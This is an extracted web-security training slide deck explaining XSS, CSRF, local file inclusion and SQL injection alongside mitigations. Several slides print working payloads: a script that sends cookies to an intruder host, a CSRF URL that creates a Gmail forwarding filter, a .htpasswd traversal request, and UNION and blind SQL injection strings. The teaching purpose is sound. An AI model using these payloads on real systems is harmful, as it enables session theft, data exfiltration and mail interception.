11.
Web vulnerabilities make up
nearly half of all discovered
vulnerabilities in 2007
(Sans)
M
12.
Why?
A really popular medium ($)
Immature technology
Logical errors
Home-made solutions
M
13.
Phishing victims in the US
3.6 million of people lost
$3.2 billion total
(Gartner, http://www.heise-online.pl/news/item/2356/)
M
14.
Standard Web application architecture
Internet
WWW layer
(I/O filters)
Application layer
(business logic)
Database server
M
15.
Wrong!
Internet
WWW layer
(I/O filters)
New functionality
Application layer
(business logic)
Database server
M
16. Application Firewall vs. Proper
architecture, coding and SDLC
Internet
Web Application Firewall
Warstwa WWW
(filtry wejścia/wyjścia)
New functionality
Application layer
(business logic)
Database server
M
17.
The right approach
Internet
Web Application Firewall
WWW layer
(I/O filters)
Application layer
New functionality
(business logic)
Database server
M
18.
Most popular attacks
PHP Remote File Include
SQL Injection
Cross-Site Scripting
Cross-site Request Forgery
(SANS Top-20 2007 Security Risks, 2007 Annual Update)
M
27.
Conclusion?
Staying
secure requires specific
mindset
(Paranoia? ;-)
B
28.
Client side
access control
It’s possible to bypass the interface
Unlike in ATMs
Does not work!
B
29.
Client side access control
RSS feed name based on user ID
server.tld/rss/100_rss.xml
server.tld/rss/101_rss.xml
server.tld/rss/102_rss.xml
Reading other user’s messages
server.tld/index.php?p=ok&action=msgs2&msgs_id=80
server.tld/index.php?p=ok&action=msgs2&msgs_id=81
server.tld/index.php?p=ok&action=msgs2&msgs_id=82
B
32.
Reflective XSS
Server
http://server/index.php?id=<script>…</script>
GET /index.php?
id=<script>…</script>
HTTP/1.1
Web Intruder
Application User
…<script>…</script>…
exec(…)
Data available
in the context
of the User
B
33.
Example XSS code
document.write(‘
<img src=„
http://intruder.tld/cookiemonster.gif?
’+escape(document.cookie) +’ ”>
’);
B
35.
Rebranding through XSS
http://server.tld/topics/%3Cscript%3Eeval(String.fromCharCode(100,111,99,117,
109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,
34,108,111,103,111,34,41,46,105,110,110,101,114,72,84,77,76,61,34,60,105,10
9,103,32,115,114,99,61,39,104,116,116,112,58,47,47,119,119,119,46,101,122,1
11,116,101,114,105,107,97,46,112,108,47,105,109,97,103,101,115,47,115,109,1
05,108,101,121,46,103,105,102,39,62,34));%3C%252fscript%3E
document.getElementById(quot;logoquot;).innerHTML=
quot;<img src='http://www.srv.tld/images/smiley.gif'>quot;
M
36.
This is how it looks in
the webpage code
...
<div id=quot;maincontentquot;>
<h2>Results for: <span style=quot;color:
#f00;quot;><script>eval(String.fromCharCode(100,111,99,117,109,101
,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,1
00,40,34,108,111,103,111,34,41,46,105,110,110,101,114,72,84,77
,76,61,34,60,105,109,103,32,115,114,99,61,39,104,116,116,112,5
8,47,47,119,119,119,46,101,122,111,116,101,114,105,107,97,46,1
12,108,47,105,109,97,103,101,115,47,115,109,105,108,101,121,4
6,103,105,102,39,62,34));</script></span></h2>
</div>
...
M
37.
The code that is to be changed
<div id=quot;logoquot;>
<div class=quot;logolinkquot;>
<a href=quot;http://server.tld/quot;>server.tld</a>
</div>
...
</div>
M
41.
Content change using XSS
Is not permanent
Better code easier (sic!)
An idea:
A form that looks just like a
legitimate one, but sends input
data elsewhere phishing
B
42.
Authentication using cookies
POST /login.php HTTP/1.1
login=user&password=asd12ed]r3
HTTP/1.1 OK 200
Set-cookie: user_id=734223s8uod42
Welcome user
User
GET /index.php HTTP/1.1
Cookie: user_id=734223s8uod42
Server
Welcome user
B
43.
Impersonating a legitimate user
POST /login.php HTTP/1.1
login=user&password=asd12ed]r3
HTTP/1.1 OK 200
Set-cookie: user_id=734223s8uod42
Welcome user
User
GET /index.php HTTP/1.1
Cookie: user_id=734223s8uod42
Server
Welcome user
GET /index.php HTTP/1.1
Cookie: user_id=734223s8uod42
Intruder
Welcome user
B
48.
How to send yourself a cookie?
XMLHttpRequest
Troublesome across domains
Link
img, iframe, location.href, etc.
Przykład: <img
src=quot;http://server.tld/cookiemonster.gif?PHPSESSID%3Dgji9h519llgbgbnaqg7
si0q1l0%3B%20__utma%3D258102041.949163972.1198624259.1198624259.
1198624259.1%3B%20__utmb%3D258102041%3B%20__utmc%3D25810204
1%3B%20__utmz%3D258102041.1198624259.1.1.utmccn%3D%28direct%29
%7Cutmcsr%3D%28direct%29%7Cutmcmd%3D%28none%29quot;>
B
49.
What can we do?
Tie a session ID with an IP address
Require re-authentication
Filter or sanitise input data !!!
- White-listing (ScRipT)
- Consistency (IDS, Firewall, App)
- In-depth (....// ../), UTF-7
B
50.
http://server.tld/topics/<img
src=http://www.serv.tld/images/smiley.gif>
/
M
54.
Stored XSS
Server
POST /register.php HTTP/1.1
login=<script>…</script>&password=asd
Web Application
GET /index.php HTTP/1.1
<script>…</script>
User
…<script>…</script>… Intruder
exec(…)
Database Data available
in the context
of the User
B
55.
Stored XSS Exploitation?
Permanent content alteration
Easy session ID hijack
CSRF
XSS Proxy
Automated worms
- mySpace, Orkut, Nduja, Borys
Easy ;] in web portals that allow users to publish their
own content:
- bidding portals, blogs, web fora, etc
B
57.
XSS Worm
Web Server
Stores the XSS-worm code in their profile
Intruder XSS
…
Intruder
User_1
User_2
B
58.
XSS Worm
Web Server
Stores the XSS-worm code in their profile
GET /intruder/ HTTP/1.1 User_1
Intruder XSS
…<script>…</script>…
… exec(…)
Stores the XSS-worm
code in their profile
Intruder
User_1 XSS
User_2
B
59.
XSS Worm
Web Server
Zapisuje XSS w swoim profilu
GET /intruder/ HTTP/1.1 User_1
Intruder XSS
…<script>…</script>…
User_2
…
Stores the XSS-worm exec(…)
code in their profile
Intruder
GET /user1/ HTTP/1.1
User_1 XSS
…<script>…</script>…
Stores the XSS-worm exec(…)
User_2 XSS code in their profile
B
60.
Nduja – A Cross Domain/Webmail XSS Worm
Intruder
E-mail E-mail E-mail
E-mail
Web Web Web Web
Server Server Server Server
WebMail WebMail WebMail WebMail
Libero.it Tiscali.it Lycos.it Excite.com
B
61.
What can we do?
Tie a session ID with an IP address
Require re-authentication
Filter or sanitise input data !!!
- White-listing (ScRipT)
- Consistency (IDS, Firewall, App)
- In-depth (.. ..// ../), UTF-7
Filter or sanitise data stored in
and read from a database
B
63.
CSRF
Server
http://server.tld/delete.php?id=34
Web
Application
GET /delete.php?id=34 HTTP/1.1
Cookie: user_id=734223s8uod42
…
id = 34; Intruder
delete(id); User
…
Item deleted!
M
64.
Useful in getting to know your
users a wee bit better…
<img src=”http://nasza-
klasa.pl/invite/1?i=1”>
(/var/log/apache/fbi_cia_what-not_access.log)
B
65.
Gmail message interception (CSRF)
http://www.gnucitizen.org/util/csrf?_method=POST&_enctype=multip
art/form-data&_action=https%3A//mail.google.com/mail/h/
wt1jmuj4ddv/%3Fv%3Dprf&cf2_emc=true&cf2_email=evilinbox@maili
nator.com&cf1_from&cf1_to&cf1_subj&cf1_has&cf1_hasnot&cf1_atta
ch=true&tfi&s=z&irf=on&nvp_bu_cftb=Create%20Filter
Everyone (well almost) has a Gmail account!
(Domain hijack: www.davidairey.co.uk)
B
66.
What can we do?
POST instead of GET
not very bullet-proof: iframe, javascript
Referrer
not very bullet-proof either: proxy, browsers, header
alteration
Additional temporary ID
User ID tied to a long unpredictable key
ID-key association held on the server side
Re-authentication before sensitive operations
An vulnerability-free code!!!
B
68.
Local file include
Local file snoop (configs)
Arbitrary code execution
(If file upload to the server is permitted)
Access to source code
<?php
if(file_exists(quot;includes/$page.incquot;)) {
include quot;includes/$page.incquot;;
} else {
echo quot;In construction!<BR>quot;;
}
http://XXXXX.art.pl/p.php?page=../../../../../../../../../home/user1/publi
c_html/.htpasswd%00
B
70.
What can we do?
Harden the application server (e.g. in PHP.ini)
allow_url_fopen = Off
allow_url_include = Off
register_global = Off
safe_mode = On
register_globals = Off
safe_mode_gid = Off
display_errors = Off
log_errors = On
error_log = /var/log/httpd/php_error.log
disable_functions = system, shell_exec, exec, passthru
Watch out for some special characters (null
byte, etc)
Filter and sanitise (../, UTF, etc)
WAFs: mod_security, Suhosin PHP
B
72.
SQL Injection
Server
GET /login.php HTTP/1.1
login=admin&password=1’ or 1=‘1
Web Application
Intruder
select * from users where login=‘admin’ and pass=‘1’ or 1=‘1’
Welcome admin!
$dane = db_exec(„select from users where
Database login=‘$login’ and pass=‘$pass’”)
if ($dane.count) {
print („Welcome $login”)
…
} else {
print („Bye”);
exit (0);
}
M
75.
priv_search=&cat=1&w_city=Ca%B3a+Polska' and
1=0#&submit=Szukaj
M
76.
priv_search=&cat=1&w_city=Ca%B3a+Polska'
union all select @@version#&submit=Szukaj
The used SELECT statements
have a different number
of columns
M
77.
priv_search=&cat=1&w_city=Ca%B3a+Polska' union all select
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,@@version#&submi
t=Szukaj
M
78.
priv_search=&cat=1&w_city=Ca%B3a+Polska' union all select
1,2,3,4,5,6,7,8,9,10,@@version,12,13,14,15,16,17,18#&submi
t=Szukaj
M
79. priv_search=&cat=1&w_city=Ca%B3a+Polska' union all select
1,2,3,TABLE_SCHEMA,5,6,7,8,9,10,TABLE_NAME,12,COLUMN_
NAME,14,15,16,17,18 from information_schema.columns
where TABLE_SCHEMA != 'mysql' and TABLE_SCHEMA !=
'information_schema'#&submit=Szukaj
M
84.
Blind SQL Injection
(experimenting)
1' and 1='0
OK
1' or 1='1
This email is already registered. You
need to pick another one
1' union all SELECT IF( user() like '%sig%',
BENCHMARK(3000000,MD5( 'x' )),NULL)#
delay user() == sig@...
1' union all SELECT IF( user() like '%asd%',
BENCHMARK(3000000,MD5( 'x' )),NULL)#
no delay
B
86.
Product database for
selected category is
empty
B
87.
Blind SQL Injection
• /zgoda.php?id=155765%20AND%20(select%2
0ascii(substring((select%20login%20from%20a
dmini%20limit%201,1),1,1)))%3D97
• id=155765 AND (select ascii(substring((select
login from admini limit LINIA,1), MIEJSCE, 1)))
=ZNAK_ASCII
B
88.
Results of a successful blind
SQL Injection attack
Delay
Different content
Error message
B
89.
What can we do?
Filter and sanitise input data
- Characters white-listing
- Consistency (IDS, Firewall,
Application, Database)
Do not trust user-side filters
(selection lists, JavaScript, etc)
M
91.
Web application security is bad
Vulnerability-causing mistakes are
everywhere*
*well, almost everywhere ;-)
M
92.
What to do?
Be sure to properly sanitise data
coming from and being sent to the
user
Web Application Firewall (WAF)
IDS
White-listing!
M
93.
Be aware of potential threats
Listenand ask
Use professional assistance
Perform a cost-benefit analysis
every piece of feedback is worth listening
M
94.
Use proven solutions
• Traditional coding errors got answered by
managed code, automatic typing, GC, etc.
• Web frameworks help maintain code quality
in Web Applications
– Assure code quality to some degree
– We are not 100% safe
» Frameworks are not mature enough
» Not everyone knows how to use them properly
» Sometimes expanded in a dumb way
» Wide exploitation due to mass usage
M
95.
Hardening
Proper configuration
is a key!
One application server configuration directive may
prevent a vulnerability from being exploited
PHP:
http://www.sans.org/top20/#s1
M
96.
Think!
No technical control will
protect you from logical
errors
M